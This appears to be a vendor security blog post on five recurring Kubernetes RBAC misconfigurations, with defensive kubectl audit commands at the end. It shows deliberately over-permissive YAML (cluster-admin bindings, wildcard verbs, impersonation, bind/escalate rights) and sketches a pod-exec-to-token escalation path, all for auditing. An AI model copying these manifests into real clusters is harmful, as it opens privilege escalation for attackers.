Menu
Back to blog
kubernetesrbaccloud-native

Kubernetes RBAC: The Same Five Misconfigs, Every Single Cluster

Patrick PutmanFebruary 12, 20258 min read

I've reviewed a lot of GKE clusters. The RBAC findings are almost identical every time — not because teams are careless, but because Kubernetes makes it genuinely easy to get this wrong. The API is expressive, the docs are decent, and the security implications of specific verb combinations are buried in implementation details that nobody reads until something goes wrong.

Here are the five patterns I find in nearly every cluster I look at.

1. ClusterAdmin bindings on service accounts

This is the most common one, and the blast radius is enormous:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: my-app-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: my-app
    namespace: production

I know exactly how this happens. Someone needed to get something working quickly — usually a Helm chart that kept failing on permissions — got it working, shipped it, and moved on. The service account is now cluster-admin. Anyone who can exec into a pod running as that service account, or who can create a pod in that namespace, effectively owns the cluster.

I've seen this in fintech. I've seen it in healthcare. The team that set it up is almost never the team I'm talking to when I find it.

Fix: Audit what the application actually needs and create a Role scoped to exactly those resources and verbs. Start with kubectl auth can-i --list --as=system:serviceaccount:production:my-app to see the current effective permissions.

2. Wildcard verbs in custom roles

rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["*"]

The * wildcard includes create, delete, exec, portforward, and patch. Pod exec alone is often sufficient for container escape in environments without strong admission controls. This pattern always starts as ["get", "list", "watch"] and grows to ["*"] when someone hits a permissions error under pressure and takes the path of least resistance.

Pod exec → shell in a container → read the service account token → call the Kubernetes API with the service account's permissions → iterate until you find something useful. It's not sophisticated. It's methodical.

Fix: Enumerate verbs explicitly. If you need get, list, and watch, write those three verbs.

3. Impersonation rights

rules:
  - apiGroups: [""]
    resources: ["users", "groups", "serviceaccounts"]
    verbs: ["impersonate"]

This lets the bearer act as any user or service account in the cluster — including system:masters. I find this most often on CI/CD runner service accounts that were granted impersonation so they could deploy on behalf of other identities. That made sense for the use case. The problem is the implementation grants impersonation across all users and groups, not just the specific identities the pipeline actually needs to act as.

Impersonation is effectively cluster-admin

Any principal with impersonation rights on users and groups can impersonate system:masters. Treat it with the same weight as binding cluster-admin directly — because it is.

4. Namespace-scoped roles that escalate to cluster scope

A Role in namespace A can't directly affect namespace B. But it can create a path there. The ones I find most often:

  • Create Secrets → can create a secret that a mutating webhook reads and uses cluster-wide
  • Create ServiceAccounts → can create a service account and run pods as a higher-privileged SA in the same namespace
  • Patch Deployments → can inject environment variables, modify the command, change the image to your own

The pattern: you think you're granting access to one namespace, but the permissions interact with cluster-level mechanics that weren't in scope when the role was designed.

Fix: When granting create/patch/update on workload resources, think through what an attacker with only those permissions could do with five minutes and kubectl auth can-i.

5. RBAC roles that grant RBAC management

rules:
  - apiGroups: ["rbac.authorization.k8s.io"]
    resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
    verbs: ["create", "patch", "update", "bind", "escalate"]

A principal with these rights can grant itself — or anything it controls — any permission in the cluster. The bind and escalate verbs deserve special attention. bind allows binding a role to any subject. escalate allows modifying roles to include permissions the modifier doesn't already have, bypassing Kubernetes's normal escalation protection.

I see this on operator service accounts and in multi-tenant clusters where teams were given self-service namespace management. The intent was good. The implementation handed them the keys.

How to audit your own cluster

# Find all ClusterRoleBindings to cluster-admin
kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name == "cluster-admin") | .metadata.name, .subjects'

# List all roles with wildcard verbs
kubectl get roles,clusterroles -A -o json | \
  jq '.items[] | select(.rules[]?.verbs[]? == "*") | .metadata.name'

# Check effective permissions for a service account
kubectl auth can-i --list --as=system:serviceaccount:production:my-app

None of these findings require a sophisticated attacker. They require someone patient enough to enumerate the cluster, which takes about twenty minutes with these one-liners.

If you want this automated and mapped to attack paths, Beacon's Kubernetes scanner handles it. For now, these queries will surface the critical patterns.

Related posts